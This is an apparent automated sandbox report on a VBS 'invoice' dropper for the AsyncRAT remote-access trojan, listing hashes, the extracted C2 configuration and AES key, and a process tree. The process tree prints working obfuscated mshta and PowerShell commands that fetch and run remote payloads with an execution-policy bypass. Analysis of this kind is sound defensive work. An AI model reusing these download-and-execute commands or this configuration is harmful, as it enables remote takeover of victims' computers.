Overview

overview

10

Static

static

invoice954423.vbs

windows7_x64

8

invoice954423.vbs

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-04-2021 15:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice954423.vbs

  • Size

    236B

  • MD5

    755e0f945656b708f911ff7438ee3dda

  • SHA1

    147e7d2fad41deea7b15801a815dd80c340ae9b2

  • SHA256

    4622e0560aaa02a43009773a1c42f8017cae6b63f0f7950b358c22d46c757e1c

  • SHA512

    3d6c7eab9ac8ecd9fc4b8ce2f22026444500c4fc6327c674e5298a0eb3ea23ac7e9b173c67cb4fa67ce223e2dfbd0f7b338e60d5d00320ebaf6ba969d2b5d00f

Score
10/10
asyncratrat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

bad96.ddns.net:1996

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    wV8wYBZRpKZKwS4P6oMapiOlrel4uoXW

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    bad96.ddns.net

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    1996

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice954423.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://nyc002.hawkhost.com/~mazencom/neww/3.txt
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:4024
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://nyc002.hawkhost.com/~mazencom/neww/2.txt') ;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:192
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\chrome.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:720
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""p"+"ow"+"ersh"+"ell -Ex"+"ecuti"+"onPol"+"icy Bypa"+"ss & 'C"+":\Us"+"ers\P"+"ubl"+"ic\msi"+".ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:816
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:424
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                  PID:2332

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      ea6243fdb2bfcca2211884b0a21a0afc

      SHA1

      2eee5232ca6acc33c3e7de03900e890f4adf0f2f

      SHA256

      5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

      SHA512

      189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      415731551acc036e1004f2ef257a0180

      SHA1

      07276d736deda6efaae21ea706ffd50ae95467a9

      SHA256

      a78371e5bb6c5afce20db6248455fe5d60f04a3548af7eab651c25d966b5bbcd

      SHA512

      7a132f6b9f244a55a00d02812463d476b1c64c423cd5b560f640fe3ecfb024ae73e5fa18a70d0d7eb7d91cc8f3dff8452a0ed0998aa7d80ce725c28f3e7da5f3

      Download Submit
    • C:\Users\Public\chrome.bat
      MD5

      1151fa07f8501963f789e793d38a5938

      SHA1

      8831c4ba8773c88e006579a105295a39cf2d3c22

      SHA256

      656b70e849a752e1f529a17ce27a897a1e3c8a383002c3b3d89c25eb34a67254

      SHA512

      37035273ad0621422403e85535172814e87896e854676aaf40741ad701efd4892642987e9d3a2d070cba7e881d5eadd657174b46de6e6ec50380cc295a03bc7e

      Download Submit
    • C:\Users\Public\msi.ps1
      MD5

      63744b513e19eb511a7bb66870824cd0

      SHA1

      073e681e42bc390b1ad076ac43932b593a8ff439

      SHA256

      7db96ca84f97ade18337169368f3043cb8c00b7767c3f40b8ce503ecaa898edc

      SHA512

      6262c3b64db8aabcd7cf4665887be5d29df5e1fa9875668e5ba3a1751689cfd31275ee61e1ba6bc5c68cc64e652271855a36701eee24c1291129d699e800cafd

      Download Submit
    • memory/192-116-0x0000000000000000-mapping.dmp
      Download
    • memory/192-122-0x000002EA5A150000-0x000002EA5A151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-127-0x000002EA5A180000-0x000002EA5A182000-memory.dmp
      Filesize

      8KB

      Download
    • memory/192-128-0x000002EA5A183000-0x000002EA5A185000-memory.dmp
      Filesize

      8KB

      Download
    • memory/192-129-0x000002EA5AD60000-0x000002EA5AD61000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-136-0x000002EA5A186000-0x000002EA5A188000-memory.dmp
      Filesize

      8KB

      Download
    • memory/424-154-0x0000000000000000-mapping.dmp
      Download
    • memory/424-171-0x00000135C76C0000-0x00000135C76C2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/424-172-0x00000135C76C3000-0x00000135C76C5000-memory.dmp
      Filesize

      8KB

      Download
    • memory/424-175-0x00000135C9110000-0x00000135C9128000-memory.dmp
      Filesize

      96KB

      Download
    • memory/424-180-0x00000135C76C6000-0x00000135C76C8000-memory.dmp
      Filesize

      8KB

      Download
    • memory/720-149-0x0000000000000000-mapping.dmp
      Download
    • memory/816-152-0x0000000000000000-mapping.dmp
      Download
    • memory/2332-181-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

      Download
    • memory/2332-182-0x000000000040C70E-mapping.dmp
      Download
    • memory/2332-186-0x00000000053A0000-0x00000000053A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4024-114-0x0000000000000000-mapping.dmp
      Download